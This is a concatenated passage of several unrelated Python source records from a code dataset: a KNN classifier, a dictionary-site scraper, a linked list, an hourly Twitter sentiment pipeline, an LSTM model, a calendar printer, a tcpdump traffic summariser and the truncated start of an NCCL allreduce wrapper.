TrainMarksProvider()\n self.path_provider = TrainPathProvider()\n self.search_space = self.load_search_space()\n\n def load_search_space(self):\n path = self.path_provider.get_train_features_path()\n with open(path) as file_in:\n dtos = []\n for line in file_in:\n featuresDto = ImageFeaturesDto(**json.loads(line))\n dtos.append(featuresDto)\n return pd.DataFrame(dtos)\n\n def create_search_space_with_rank(self, rank):\n allowed = set(self.train_marks_provider._get_by_rank(rank))\n mask = self.search_space['image_number'].isin(allowed)\n\n df = self.search_space[mask]\n df['vector'] = df.apply(lambda r: np.array(r['vector']), axis=1)\n df['labels'] = df.apply(lambda r: r['labels'], axis=1)\n\n features = np.vstack(df['vector'].values)\n labels = np.vstack(np.ravel(df['labels'].values))\n return features, labels\n\n def create_classifier(self, features, labels):\n clf = KNeighborsClassifier(n_neighbors=10, weights='distance', algorithm='ball_tree', n_jobs=-1)\n clf.fit(features, labels)\n return clf\n\n def create_full_classifier(self):\n features, labels = self.create_search_space_with_rank(1)\n classifire = self.create_classifier(features, labels)\n for rank in range(2, 6):\n many_label_features, many_label_labels = self.create_search_space_with_rank(rank)\n one_label_features, one_label_labels = self.reformat_non_one_lable_sample_to_one_lable(classifire, labels,\n many_label_features,\n many_label_labels)\n print((features.shape, one_label_features.shape, labels.shape, one_label_labels.shape))\n features = np.concatenate((features, one_label_features))\n labels = np.concatenate((labels, one_label_labels))\n classifire = self.create_classifier(features, labels)\n print(f'rank {rank} done')\n\n features_file = TrainPathProvider().get_search_space_features_path()\n with open(features_file, 'wb') as f:\n np.save(f, features)\n\n labels_file = TrainPathProvider().get_search_space_labels_path()\n with open(labels_file, 'wb') as f:\n np.save(f, labels)\n\n def _reformat_non_one_lable_sample_to_one_lable(self, classifier, classifier_labels, features, labels):\n distances, indices = classifier.kneighbors(features, n_neighbors=10)\n kneighbours = classifier_labels[\n indices] # тут должен получится (k=10, 1) массив подходящих лейблов по возрастанию расстояния\n for i, feature_neighbours in enumerate(kneighbours):\n for vector in feature_neighbours:\n label = vector[0]\n if label in labels[i]:\n yield features[i], label\n break\n\n def reformat_non_one_lable_sample_to_one_lable(self, classifier, classifier_labels, features, labels):\n res = np.asarray(\n list(self._reformat_non_one_lable_sample_to_one_lable(classifier, classifier_labels, features, labels)))\n features, labels = np.vstack(np.ravel(res[:, 0])), res[:, 1].reshape(-1, 1)\n return features, labels\n","sub_path":"ClassifireCreator.py","file_name":"ClassifireCreator.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"164404988","text":"import sys\nimport time\nfrom urllib.request import urlopen\nimport bs4\n\nURL = 'https://eow.alc.co.jp/search?q={}'\n\ndef main(word):\n resp = urlopen(URL.format(word))\n soup = bs4.BeautifulSoup(resp, 'html.parser')\n try:\n attr = ''.join(soup.find('span', class_='attr').strings)\n except AttributeError:\n attr = 'Failed...(T_T)'\n return attr\n\n\nif __name__ == '__main__':\n for i, word in enumerate(sys.argv[1:], 1):\n print(main(word))\n if i + 1 < len(sys.argv):\n time.sleep(5)\n \n","sub_path":"Accent/alc.py","file_name":"alc.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"164762144","text":"import random\n\n\nclass Node(object):\n \"\"\"节点\"\"\"\n def __init__(self, elem):\n self.elem = elem\n self.next = None\n\n\nclass LinkList(object):\n def __init__(self, node=None):\n self.__head = node\n\n def get_elem(self, i):\n \"\"\"返回i位置的元素\"\"\"\n p = self.__head\n j = 1\n while p and j < i:\n p = p.next\n j += 1\n assert p and j <= i, \"There is no node at %d\" % i\n return p.elem\n\n def get_head(self):\n \"\"\"返回头结点\"\"\"\n return self.__head\n\n def get_tail(self):\n \"\"\"返回尾结点\"\"\"\n p = self.get_head()\n while p:\n p = p.next\n return p\n\n def get_length(self):\n \"\"\"得到链表的长度\"\"\"\n count = 0\n p = self.__head\n while p:\n p = p.next\n count += 1\n return count\n\n def is_empty(self):\n \"\"\"判空\"\"\"\n return self.__head is None\n\n def add(self, e):\n \"\"\"链表头部添加元素\"\"\"\n n = Node(e)\n p = self.__head\n n.next = p\n self.__head = n\n\n def append(self, e):\n \"\"\"链表尾部添加元素\"\"\"\n n = Node(e)\n p = self.__head\n if self.__head:\n while p.next:\n p = p.next\n p.next = n\n else:\n self.__head = n\n\n def list_insert(self, i, e):\n \"\"\"在i位置后面插入元素e\"\"\"\n j = 1\n p = self.__head\n if i == 0:\n self.add(e)\n return True\n if i >= self.get_length():\n self.append(e)\n return True\n else:\n while p and j < i:\n p = p.next\n j += 1\n n = Node(e)\n n.next = p.next\n p.next = n\n return True\n\n def travel(self):\n \"\"\"遍历整个链表\"\"\"\n p = self.__head\n li = []\n while p:\n li.append(p.elem)\n p = p.next\n print(li)\n return True\n\n def list_delete(self, i):\n \"\"\"将i位置元素删除\"\"\"\n assert 0 < i <= self.get_length(), \"There is no node at %d\" % i\n p = self.__head\n pre = None\n j = 1\n if i == 1:\n self.__head = p.next\n else:\n while p and j < i:\n pre = p\n p = p.next\n j += 1\n if p.next:\n pre.next = p.next\n else:\n pre.next = None\n return True\n\n def create_list_head(self, num):\n \"\"\"随机生成num长度的链表\"\"\"\n for i in range(0, num):\n e = random.randint(0, 100)\n n = Node(e)\n head = self.get_head()\n n.next = head\n self.__head = n\n\n\n","sub_path":"Linked_List.py","file_name":"Linked_List.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"286551332","text":"\n'''\ndata processing: starting with reading filenames for loading\n'''\n\nfrom glob import glob \nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport time\n\nfrom processing_helpers import * \nfrom summarizing_helpers import *\nfrom city_data_helpers import * \n\ndata_source = '/data/'\ndata_dest = '/data/app_data/'\n\n\n\ndef process_new_data():\n\n '''\n Stage 1: process raw data into several datasets \n\n '''\n\n current_time = datetime.utcnow() + pd.DateOffset(hours=-6)\n # impute date if there is too much new data (more than one day of data) to process \n # current_time = pd.to_datetime('2020-08-17 23:59')\n\n current_time_s = current_time.strftime('%Y-%m-%d %H:%M:%S')\n current_time_s\n\n # read file names\n files_1 = glob(data_source + \"BLM_tweet_original_*/*/*/*/*\")\n files_2 = glob(data_source + \"BLM_tweet_retweet_*/*/*/*/*\")\n\n # use the following when imputed date is used \n # files_1 = keep_recent_files2(glob(data_source + \"BLM_tweet_original_*/*/*/*/*\"),\n # current_time + pd.Timedelta(6, unit='h'), days=2, no_newer=True)\n # files_2 = keep_recent_files2(glob(data_source + \"BLM_tweet_retweet_*/*/*/*/*\"),\n # current_time + pd.Timedelta(6, unit='h'), days=2, no_newer=True)\n\n\n\n processing_begin_logs = pd.read_csv(data_dest + 'data_processing_log/processing_begin.csv')\n processing_begin_logs.timestamp = pd.to_datetime(processing_begin_logs.timestamp)\n processing_begin_logs_h = [time.floor(\"h\") for time in processing_begin_logs.timestamp]\n\n current_time_s = pd.to_datetime(current_time_s)\n current_time_h = current_time_s.floor(\"h\")\n\n # flag for updating current data if it is not processed in the same clock hour\n update_current_data = current_time_h not in processing_begin_logs_h\n # ! overwrite for testing\n update_current_data = True\n\n print('update_current_data:' , update_current_data)\n\n\n # initial file creation\n # pd.DataFrame([current_time_s], columns = {'timestamp'}).to_csv('data_processing_log/processing_begin.csv', index=False)\n\n # append to file log line_terminator='\\n')\n with open(data_dest + 'data_processing_log/processing_begin.csv','a') as fd:\n fd.write('\\n'+str(current_time_s))\n\n\n # read previous filenames\n existing_files_1 = pd.read_csv(data_dest + 'data_filenames/files_read_BLM_tweet_original.csv')\n existing_files_2 = pd.read_csv(data_dest + 'data_filenames/files_read_BLM_tweet_retweet.csv')\n\n # get new file names \n new_files_1 = [file for file in files_1 if file.split(data_source)[1] not in np.array(existing_files_1.name)]\n new_files_2 = [file for file in files_2 if file.split(data_source)[1] not in np.array(existing_files_2.name)]\n\n ## set a limit when there are too much data to process\n # if len(new_files_1)>50:\n # new_files_1 = new_files_1[:50] \n\n\n print('original tweet files:')\n [ print(file) for file in new_files_1]\n print('retweet files:')\n [ print(file) for file in new_files_2]\n\n\n new_original = len(new_files_1)>0\n new_retweet = len(new_files_2)>0\n\n\n # get new data \n ori = new_tw_data(new_files_1, type='original')\n rt = new_tw_data(new_files_2, type='retweet')\n\n\n try:\n print('Going to process {} records of original tweets and {} records of retweets.'.format(len(ori.df), len(rt.df)))\n \n except:\n try: print('Going to process {} records of original tweets.'.format(len(ori.df)))\n except: \n try: print('Going to process {} records of retweets.'.format(len(rt.df)))\n except: print('No new data to process at this time.')\n\n\n ori.assign_sentiments()\n ori.assign_emotions()\n ori.count_words()\n\n rt.assign_sentiments()\n rt.assign_emotions()\n rt.count_words()\n\n # bgn_timespan = ori.df.created_at.min() if new_original else current_time_s\n\n # load stats from cumulative retweet to match with new data\n ref_sentiments = pd.read_csv(data_dest + \n 'data_cumulative/retweet/2020_all_sentiments.csv')\n ref_emotions = pd.read_csv(data_dest + \n 'data_cumulative/retweet/2020_all_emotions.csv')\n ref_words = pd.read_json(data_dest + \n 'data_cumulative/retweet/2020_all_words.json', orient='records', lines=True)\n\n fix_datetime(ref_sentiments)\n fix_datetime(ref_emotions)\n fix_datetime(ref_words)\n fix_token_counter(ref_words)\n\n # combine new stat data and matched data from cumulative retweet data \n if new_original:\n new_sentiments = merge_datasets(or_df = ori.df, \n or_data = ori.df_sentiments, \n ref_data = ref_sentiments)\n\n new_emotions = merge_datasets(or_df = ori.df, \n or_data = ori.df_top_emotions, \n ref_data = ref_emotions)\n\n new_words = merge_datasets(or_df = ori.df, \n or_data = ori.df_words, \n ref_data = ref_words)\n\n # store datetime as string\n new_words.created_at_h = new_words.created_at_h.astype(str)\n ori.df.created_at_h = ori.df.created_at_h.astype(str)\n\n # add new data into cumulative datasets\n time_as_filename = 'created_at_' + str(current_time_s).replace(\" \",\"_\")\n new_sentiments.to_csv(data_dest + 'data_cumulative/sentiments/' + time_as_filename + '.csv', index=False)\n new_emotions.to_csv(data_dest + 'data_cumulative/emotions/'+ time_as_filename + '.csv', index=False)\n new_words.to_json(data_dest + 'data_cumulative/words/'+ time_as_filename +'.json', orient='records', lines=True)\n ori.df.to_json(data_dest + 'data_cumulative/original/'+ time_as_filename +'.json', orient='records', lines=True)\n\n # correct datetime data type\n new_words.created_at_h = pd.to_datetime(new_words.created_at_h)\n ori.df.created_at_h = pd.to_datetime(ori.df.created_at_h)\n\n print(' Updated cumulative data: sentiments, emotions, words, and original.')\n\n\n\n cum_retweet = pd.read_json(data_dest + \"data_cumulative/retweet/2020_all_retweets.json\",\n lines=True, orient='records')\n fix_RT_id(cum_retweet)\n\n # overwrite retweet data\n if new_retweet: \n cum_retweet = cum_retweet.append(rt.df)\n\n cum_retweet = cum_retweet.drop_duplicates(subset = 'RT_id')\n cum_retweet.created_at_h = cum_retweet.created_at_h.astype(str)\n \n cum_retweet.to_json(data_dest + \"data_cumulative/retweet/2020_all_retweets.json\",\n lines=True, orient='records')\n print(' Updated cumulative data: retweet.')\n\n file_loc = 'data_cumulative/retweet/'\n\n rt.df_words = rt.df_words.reset_index()\n rt.df_sentiments = rt.df_sentiments.reset_index()\n rt.df_top_emotions = rt.df_top_emotions.reset_index()\n\n ref_words = ref_words.append(rt.df_words)\n ref_words.created_at_h = ref_words.created_at_h.astype(str)\n ref_sentiments = ref_sentiments.append(rt.df_sentiments)\n ref_emotions = ref_emotions.append(rt.df_top_emotions)\n\n ref_words.append(rt.df_words).to_json(data_dest + file_loc + '2020_all_words.json', orient='records', lines=True)\n ref_sentiments.to_csv(data_dest + file_loc + '2020_all_sentiments.csv', index=False)\n ref_emotions.to_csv(data_dest + file_loc + '2020_all_emotions.csv', index=False) \n print(' Updated cumulative data: retweet-words, sentiments, and emotions.')\n\n\n # # correct data types\n # fix_datetime(cum_retweet)\n # fix_datetime(ref_sentiments)\n # fix_datetime(ref_emotions)\n # fix_datetime(ref_words)\n # fix_token_counter(ref_words)\n\n\n ## initial files\n #pd.DataFrame(new_files_1, columns = {'name'}).to_csv('data_filenames/files_read_BLM_tweet_original.csv', index=False)\n #pd.DataFrame(new_files_2, columns = {'name'}).to_csv('data_filenames/files_read_BLM_tweet_retweet.csv', index=False)\n\n # append new file names \n if new_original:\n new_files_1s = [file.split(data_source)[1] for file in new_files_1]\n\n pd.DataFrame(new_files_1s, \n columns = {'name'}\n ).to_csv(data_dest + 'data_filenames/files_read_BLM_tweet_original.csv', \n mode='a', header=False, index=False)\n\n if new_retweet: \n new_files_2s = [file.split(data_source)[1] for file in new_files_2]\n\n pd.DataFrame(new_files_2s, \n columns = {'name'}\n ).to_csv(data_dest + 'data_filenames/files_read_BLM_tweet_retweet.csv', \n mode='a', header=False, index=False)\n\n\n if new_original: del new_sentiments, new_emotions, new_words, ori, rt\n if new_retweet: del cum_retweet, ref_sentiments, ref_emotions, ref_words\n\n\n '''\n Stage 2: Process data into data_cumulative/city_date data \n\n '''\n cities = ['Minneapolis','LosAngeles','Denver','Miami','Memphis',\n 'NewYork','Louisville','Columbus','Atlanta','Washington',\n 'Chicago','Boston','Oakland','StLouis','Portland',\n 'Seattle','Houston','SanFrancisco','Philadelphia','Baltimore']\n\n \n city_filterwords = {\n 'Minneapolis': ['Minneapolis','mlps', ['St', 'Paul']],\n 'LosAngeles':['LosAngeles','LA', ['Los', 'Angeles']],\n 'Denver': ['Denver', 'DEN'],\n 'Miami': ['Miami'],\n 'Memphis': ['Memphis'],\n 'NewYork': ['NewYork',['New','York'], 'NY','NYC','manhattahn'],\n 'Louisville': ['Louisville'],\n 'Columbus': ['Columbus'],\n 'Atlanta': ['Atlanta'],\n 'Washington': ['Washington','DC','WashingtonDC'],\n 'Chicago': ['Chicago'],\n 'Boston': ['Boston'],\n 'Oakland': ['Oakland'],\n 'StLouis': ['StLouis',['St','Loius']],\n 'Portland': ['Portland'],\n 'Seattle': ['Seattle'],\n 'Houston': ['Houston'],\n 'SanFrancisco': ['SanFrancisco','SF',['San','Francisco']],\n 'Philadelphia': ['Philadelphia'],\n 'Baltimore': ['Baltimore']\n }\n\n cities_all = ['all_v1','all_v2','all_v3','all_v4','all_v5']\n \n #data_dest = '/Users/kotaminegishi/big_data_training/python/dash_demo1/'\n # data_dest = '/data/app_data/'\n \n data_dest_files = data_dest + 'data_cumulative/'\n days_to_keep = 1 # files to read within x days\n days_to_process = 2 # original tweet ids to match within x days \n\n # current_time = datetime.utcnow() + pd.DateOffset(hours=-6)\n # current_time_s = current_time.strftime('%Y-%m-%d %H:%M:%S')\n\n # current_time_s = pd.to_datetime(current_time_s)\n base_timestamp = current_time_s.floor('h')\n #base_timestamp = pd.to_datetime(datetime(2020,7,20))\n\n print('Going to process city_date data: ', base_timestamp) \n\n\n # for city in cities:\n\n # # Parent Directory path \n # parent_dir = data_dest + \"data_cumulative/city_date/\"\n\n # # Path \n # path = os.path.join(parent_dir, city) \n\n # dir_exist = os.path.isdir(path)\n\n # if not dir_exist:\n # # Create the directory \n # os.mkdir(path) \n # os.mkdir(path + '/original') \n # os.mkdir(path + '/retweet') \n # os.mkdir(path + '/sentiments') \n # os.mkdir(path + '/emotions')\n # os.mkdir(path + '/words') \n # print(\"City_date directory for '%s' created\" %city) \n\n\n files_retweet = [data_dest + 'data_cumulative/retweet/2020_all_retweets.json']\n\n\n files_all_original = keep_recent_files(\n glob(data_dest_files + 'original/*'), # not everything may not be read via S3 mount\n base_timestamp, \n file_type= '.json', \n days = days_to_keep, no_newer=True)\n\n files_all_sentiments = keep_recent_files(\n glob(data_dest_files + 'sentiments/*'), \n base_timestamp, \n file_type= '.csv', \n days = days_to_keep, no_newer=True)\n\n files_all_emotions = keep_recent_files(\n glob(data_dest_files + 'emotions/*'), \n base_timestamp, \n file_type= '.csv', \n days = days_to_keep, no_newer=True)\n\n files_all_words = keep_recent_files(\n glob(data_dest_files + 'words/*'), \n base_timestamp, \n file_type= '.json', \n days = days_to_keep, no_newer=True)\n\n try:\n # read previous filenames\n files_existing_original = pd.read_csv(data_dest + 'data_filenames/files_read_original.csv')\n files_existing_sentiments = pd.read_csv(data_dest + 'data_filenames/files_read_sentiments.csv')\n files_existing_emotions = pd.read_csv(data_dest + 'data_filenames/files_read_emotions.csv')\n files_existing_words = pd.read_csv(data_dest + 'data_filenames/files_read_words.csv')\n\n # get new file names \n files_original = [file for file in files_all_original if file.split(data_dest_files)[1] not in np.array(files_existing_original.name)]\n files_sentiments = [file for file in files_all_sentiments if file.split(data_dest_files)[1] not in np.array(files_existing_sentiments.name)]\n files_emotions = [file for file in files_all_emotions if file.split(data_dest_files)[1] not in np.array(files_existing_emotions.name)]\n files_words = [file for file in files_all_words if file.split(data_dest_files)[1] not in np.array(files_existing_words.name)]\n\n mode = 'a'\n header = False\n\n except:\n # initialize filenames \n files_original = files_all_original\n files_sentiments = files_all_sentiments\n files_emotions = files_all_emotions\n files_words = files_all_words\n mode = 'w'\n header = True\n\n\n '''\n process data for cities and cities_all\n '''\n\n print('Going to process the following retweet files:', files_retweet)\n retweet_files_by_city_json(files_retweet, cities, city_filterwords, data_dest, verbose=True)\n\n df_retweet = pd.read_json(files_retweet[0], orient='records',lines=True)\n for c in cities_all:\n filename = data_dest + 'data_cumulative/city_date/' + c + '/retweet/2020_all_retweets.json'\n df_retweet.to_json(filename, orient='records',lines=True)\n print('updated ', filename)\n\n print('Going to process the following original files:', files_original)\n original_files_by_city_date_json(files_original, cities, city_filterwords, data_dest, verbose=True)\n \n original_files_by_city_date_json(files_original, cities_all, [], \n data_dest, verbose=True, city_type='all', sample_frac=.1)\n\n\n print('Going to process the following sentiments files:', files_sentiments)\n files_id_matched_by_city_date_json(\n files_sentiments, cities + cities_all, data_dest, 'sentiments', \n base_timestamp, process_days = days_to_process,\n file_type='.csv', verbose=True)\n\n\n print('Going to process the following emotions files:', files_emotions)\n files_id_matched_by_city_date_json(\n files_emotions, cities + cities_all, data_dest, 'emotions', \n base_timestamp, process_days = days_to_process,\n file_type='.csv', verbose=True)\n\n\n print('Going to process the following words files:', files_words)\n files_id_matched_by_city_date_json(\n files_words, cities + cities_all, data_dest, 'words', \n base_timestamp, process_days = days_to_process,\n file_type='.json', verbose=True)\n\n \n # update filenames for those that are read and processed\n files_original_s = [file.split(data_dest_files)[1] for file in files_original]\n files_sentiments_s = [file.split(data_dest_files)[1] for file in files_sentiments]\n files_emotions_s = [file.split(data_dest_files)[1] for file in files_emotions]\n files_words_s = [file.split(data_dest_files)[1] for file in files_words]\n\n\n files_read_update(files_original_s, \n data_dest + 'data_filenames/files_read_original', mode=mode, header =header)\n\n files_read_update(files_sentiments_s, \n data_dest + 'data_filenames/files_read_sentiments', mode=mode, header =header)\n\n files_read_update(files_emotions_s, \n data_dest + 'data_filenames/files_read_emotions', mode=mode, header =header)\n\n files_read_update(files_words_s, \n data_dest + 'data_filenames/files_read_words', mode=mode, header =header)\n\n \n\n\n '''\n \tStage 3: Pre-calculate statistics for data_current/city and data_cumulative/city_date/stat \n '''\n # Execute the following when \"update_current_data = True\"\n # This section updates data for the unfiltered data using a small sample\n if update_current_data:\n print('\\nUpdating current data files...')\n \n process_timestamp = base_timestamp\n print('process_timestamp: ', process_timestamp) \n current_datetime = process_timestamp.floor('h')\n \n # include potential repair candidates for the past hrs of the same date \n all_stats_datetime = [str(current_datetime + pd.Timedelta(-h, unit='h')) for h in range(1, current_datetime.hour)]\n #all_stats_datetime = [str(current_datetime + pd.Timedelta(-h, unit='h')) for h in range(1,24)]\n\n try:\n # read previous filenames\n existing_stats_datetime = pd.read_csv(data_dest + 'data_filenames/files_stats.csv')\n # get new file names \n repair_stats_datetime = [datetime for datetime in all_stats_datetime if datetime not in list(existing_stats_datetime.datetime)]\n if len(repair_stats_datetime)>0: print('Repairing city_date stats for the following datetime: ', repair_stats_datetime)\n mode = 'a'\n header = False\n\n except:\n # initialize filenames \n repair_stats_datetime = all_stats_datetime\n mode = 'w'\n header = True\n\n\n stats_datetime = repair_stats_datetime.copy()\n stats_datetime.append(str(current_datetime))\n \n update_current_data_city(cities_all + cities, data_dest, process_timestamp, repair_stats_datetime)\n\n files_read_update(stats_datetime, \n data_dest + 'data_filenames/files_stats', colname = 'datetime', mode=mode, header =header)\n print('city_date stats updated for: ', stats_datetime)\n\n\n\nif __name__==\"__main__\":\n\n import nltk\n nltk.download('vader_lexicon') \n nltk.download('stopwords')\n nltk.download('averaged_perceptron_tagger')\n nltk.download('wordnet')\n nltk.download('punkt')\n\n counter = 1\n while True: # run continuously until stopped\n print('\\n---------------------- counter: ', counter, \n '-------------------------')\n\n process_new_data()\n \n counter = counter +1\n time.sleep(3600) # 3600 seconds of sleep \n\n\n\n\n","sub_path":"container_data_processing/archive/process_data3.py","file_name":"process_data3.py","file_ext":"py","file_size_in_byte":18730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"91674102","text":"from params_and_consts import learning_rate\nimport tensorflow as tf\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, batch_input_shape=[batch_size, None]),\n tf.keras.layers.LSTM(\n rnn_units, \n return_sequences=True, \n recurrent_activation='sigmoid',\n stateful=True,\n dropout = 0.4,\n ),\n tf.keras.layers.Dense(vocab_size)\n ])\n\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])\n\n return model","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"306279356","text":"def leap_year(year):\n if year > 0:\n if year % 400 == 0:\n return \"True\"\n elif year % 100 == 0:\n return \"False\"\n elif year % 4 == 0:\n return \"True\"\n else:\n return \"False\"\n else:\n print(\"Years must be later than 0\")\n\ndef day_of_the_week(year, month, day):\n\tt = [0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4]\n\tyear -= month < 3\n\treturn (year + int(year/4) - int(year/100) + int(year/400) + t[month-1] + day) % 7\n\ndef calendar(month, year):\n day_during_week = day_of_the_week(year, month, 1)\n if month == 1:\n month_year = \"January\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 31\n elif month == 2:\n month_year = \"February\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n if leap_year(year) == True:\n days_in_month = 29\n else:\n days_in_month = 28\n elif month == 3:\n month_year = \"March\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 31\n elif month == 4:\n month_year = \"April\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 30\n elif month == 5:\n month_year = \"May\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 31\n elif month == 6:\n month_year = \"June\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 30\n elif month == 7:\n month_year = \"July\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 31\n elif month == 8:\n month_year = \"August\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 31\n elif month == 9:\n month_year = \"September\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 30\n elif month == 10:\n month_year = \"October\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 31\n elif month == 11:\n month_year = \"November\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 30\n elif month == 12:\n month_year = \"December\" + \" \" + str(year)\n print(f\"{month_year:^28}\\n\")\n days_in_month = 31\n\n print(\" S M T W T F S\\n\")\n\n for spaces in range(day_during_week):\n print(\" \", end=\"\")\n\n for day in range(1, days_in_month+1):\n print(f\"{day:>3}\", end=\" \")\n day_during_week = day_during_week + 1\n if day_during_week == 7:\n print(\"\\n\")\n day_during_week = 0\n\nmonth = int(input(\"Month for your calendar: \"))\nyear = int(input(\"Year for your calendar (Any year after 1970): \"))\n\ncalendar(month, year)\n\n# print(day_of_the_week(year, month, 1))","sub_path":"projects/dynamic_calendar.py","file_name":"dynamic_calendar.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"408076680","text":"#!/usr/bin/python3\n#Program written By: Phil King. Assignment1 for SRT311- Professor Silva\nimport re #Used for Regex\nimport sys #Used for Standard inputs\n\ndef check_ips(argvs): # This function is fed a standard input\n if ip_ex.fullmatch(argvs): #If the standard input is 4 numbers seperated by 3 periods then continue\n seclist=argvs.split('.')\n for section in seclist: #Check each number\n if int(section) > 255: #To see if any of them are over 255. The nature of this regex \n return(False) #protects against negative numbers\n return(True)\n return(False) \n\ndef check_options(argvs): #This function is fed a standard input\n if \"-s\" in argvs: #This function checks to see if -s was entered.\n return(True)\n return(False)\n\ndef portStripper(ip): #This function is fed a list of numbers\n return(ip[0]+\".\"+ip[1]+\".\"+ip[2]+\".\"+ip[3]) #Returns the 4 ip numbers seperated by periods \n\ndef repeatChecker(Source, Dest, Length): #This function checks for douplicate source/ destination pairs\n counter=0 #Keeps track of location in list\n for entry in combinations: \n if Source+' '+Dest == entry.split()[0]+' '+entry.split()[1]: #If a douplicate is found \n if Length==0: #exit if the length is 0\n return True\n else: #Otherwise add the lengths together \n combinations[counter]=Source+' '+Dest+' '+str(int(Length)+int(entry.split()[2]))\n return True\n counter+=1 \n return(False)\n \ndef parse_file(file): #This function parses the tcp dump file\n with open(file,\"r\") as tcpdump: \n for line in tcpdump:\n templine=line.split() #For each line it stores the split line\n try: \n try:\n Length=int(templine[-1])\n except TypeError: #Expected as some lengths are surrounded with brackets\n Length=templine[-1][1:-1]\n\n Source=portStripper(templine[2].split('.'))\n Dest=portStripper(templine[4].split('.'))\n if not repeatChecker(Source,Dest,Length): #If no repeats are found append the new pair to the list.\n combinations.append(Source+' '+Dest+' '+str(Length)) \n except (IndexError, ValueError): #Expected errors for TCP dump lines with information that we don't want\n continue\n \n\n\ndef sort_list(): #Sorts the prepared list\n for passnum in range(len(combinations)-1,0,-1):\n for i in range(passnum): #used bubblesort\n a=combinations[i].split()[2]\n b=combinations[i+1].split()[2]\n if int(a)2:\n print('I do not know what you want')\n elif len(validips)==2: #If 2 then just print the line, if it exists, onto the screen\n for check in combinations:\n if check.split()[0] == validips[0] and check.split()[1] == validips[1]:\n print(print_line(check))\n break\n elif len(validips)==1: #If 1 print the line with the sought after Source into results.txt\n results = open(\"results.txt\", \"w\") \n for check in combinations:\n if check.split()[0] == validips[0]:\n results.write(print_line(check))\n results.close()\n print('Results saved in results.txt')\n else: #Otherwise prints the entire list into results.txt\n results = open(\"results.txt\", \"w\")\n for check in combinations:\n results.write(print_line(check))\n results.close() \n print('Results saved in results.txt') \n\ncombinations= list() #Stores the ip, dest, and lengths\nsort = False #Holds the sort option\nvalidips = list() #Holds the list of valid ips.\nip_ex = re.compile(r\"[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\") #IS the regex used to check if ips are valid\nfor argvs in sys.argv:\n if not sort and check_options(argvs):\n sort=True\n elif check_ips(argvs) :\n validips.append(argvs)\n else:\n fn=argvs #fn holds the filename\ntry: \n parse_file(fn) \n if sort:\n sort_list()\n print_file()\nexcept FileNotFoundError: \n print(\"File not found\")","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"568439481","text":"\n\"\"\"Cuda op Python library.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os.path\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom blocksparse.ewops import float_cast\n\ndata_files_path = tf.resource_loader.get_data_files_path()\n_op_module = tf.load_op_library(os.path.join(data_files_path, 'blocksparse_ops.so'))\n\n\n############################## Nccl Ops #####################################\n\nop_counter = 0\ninit_num_comms = None\ninit_prereduce = None\n\ndef allreduce(x, sync_size=0, num_comms=2, logfile=\"\", rank=0, prereduce=0, name=None):\n assert not x.op.device or x.op.device[-2:] == \":0\", \"Only one gpu per process currently supported by allreduce: \" + x.op.device\n global op_counter\n global init_num_comms\n global init_prereduce\n\n if init_num_comms is None:\n init_num_comms = num_comms\n elif init_num_comms != num_comms:\n print(\"Warning: only the first value of num_comms (%d) that was passed in will be used. num_comms=%d vale ignored.\" % (init_num_comms, num_comms))\n\n if init_prereduce is None:\n init_prereduce = prereduce\n elif init_prereduce != prereduce:\n print(\"Warning: only the first value of prereduce (%d) that was passed in will be used. prereduce=%d vale ignored.\" % (init_prereduce, prereduce))\n\n if logfile and rank == 0:\n print(\"%03d %s\" % (op_counter, x.name))\n ret = _op_module.allreduce_nccl(x, op_num=op_counter, sync_size=sync_size, num_comms=num_comms, prereduce=prereduce, logfile=logfile, name=name)\n op_counter += 1\n return ret\n\n\ndef group_allreduce(grads, parms, search_strings=None, cast_map=None, cast_all=None, num_comms=2, prereduce=0):\n\n # if no grouping specified, create one group to reduce at the end (no overlap with compute)\n if search_strings is None:\n search_strings = [\"group_allreduce_all\"]\n\n groups = [(name, list(), list()) for name in search_strings]\n\n for i, (grad, param) in enumerate(zip(grads, parms)):\n for name, group16, group32 in groups:\n if name == search_strings[-1] or name in param.name:\n\n if cast_all is not None:\n grad = float_cast(grad, dtype=cast_all)\n\n elif cast_map is not None and name in 